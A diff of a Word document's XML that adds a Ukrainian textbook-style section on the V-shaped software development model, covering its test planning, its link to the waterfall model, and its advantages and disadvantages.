+        <w:t xml:space="preserve"> що тестування продукту обговорюється</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> проектує</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>ться</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> і планується на ранніх етапах життєвого циклу розробки. План випробування приймання замовником розробляється на етапі планування, а компоновочного випробування системи </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>-н</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">а фазах аналізу, розробки проекту і т.д. Цей процес розробки планів випробування позначений </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>пунктирною</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> лінією між прямокутниками V-подібної моделі.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>V-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>подібна</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> модель, показана </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:strike/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>на рис. 4.10</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, була розроблена як </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>ізновид</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> каскадної моделі, а значить, успадкувала від неї таку ж послідовну структуру. Кожна наступна фаза починається </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ісля завершення отримання результативних даних попередньої фази. Модель демонструє комплексний </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ідхід до визначення фаз процесу розробки ПО. У ній підкреслені взаємозв'язки, що існують між аналітичними фазами і </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>фазами</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>проектування</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>, які передують кодування, після якого йдуть фази тестування. Пунктирні лінії означаают, що ці фази необхідно розглядати паралельно.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1706,6 +3101,7 @@
           <w:noProof/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D34EFBD" wp14:editId="6829F3FB">
             <wp:extent cx="4752975" cy="2724150"/>
@@ -1968,7 +3364,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>деталізована розробка проекту - визначає і документально обґрунтовує алгоритми для кожного компонента, який був визначений на фазі побудови архітектури. Ці алгоритми надалі будуть перетворені в код;</w:t>
       </w:r>
     </w:p>
@@ -1994,6 +3389,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>розробка програмного коду - виконується перетворення алгоритмів, визначених на етапі деталізований проектування, в готове ПО;</w:t>
       </w:r>
     </w:p>
@@ -2160,6 +3556,585 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>Переваги V-подібної моделі</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>При використанні V-подібної моделі при розробці проекту, для якого вона в достатній мірі підходить, забезпечується кілька переваг:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>в моделі особливе значення надається плануванню, направленому на верифікацію і атестацію продукту, що розробляється на ранніх стадіях його розробки. Фаза модульного тестування підтверджує правильність деталізован</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>ого</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> проектування. Фази інтеграції та тестування реалізують архітектурне проектування або проектування на вищому рівні. Фаза </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>тестування системи підтверджує правильність виконання етапу вимог до продукту і його специфікації;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>в моделі передбачені атестація і верифікація всіх зовнішніх і внутрішніх отриманих даних, а не тільки самого програмного продукту;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>в V-подібній</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> моделі визначення вимог виконується перед розробкою проекту системи, а проектування ПО - перед розробкою компонентів;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>модель визначає продукти, які повинні бути отримані в результаті процесу розробки, причому кожні отримані дані повинні піддаватися тестуванню;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">завдяки моделі менеджери проекту може відстежувати хід процесу розробки. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>Т</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>ак як в даному випадку цілком можливо скористатися тимчасовою шкалою, а завершення кожної фази є контрольною точкою;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>модель проста у використанні (щодо проекту, для якого вона є прийнятною).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>Недоліки V-подібної моделі</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>При використанні V-подібної моделі в роботі над проектом, для якого вона не є в достатній мірі прийнятною, стають очевидними її недоліки:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>з її допомогою непросто впоратися з паралельними подіями;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">в ній не враховані ітерації </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>між</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> фазами;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">в моделі не передбачено внесення вимоги динамічних змін на </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ізних етапах життєвого циклу;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">тестування вимог в життєвому циклі відбувається занадто </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ізно, внаслідок чого неможливо внести зміни, які не вплинувши при цьому на графік виконання проекту;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>в модель не входять дії, спрямовані на аналіз ризикі</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
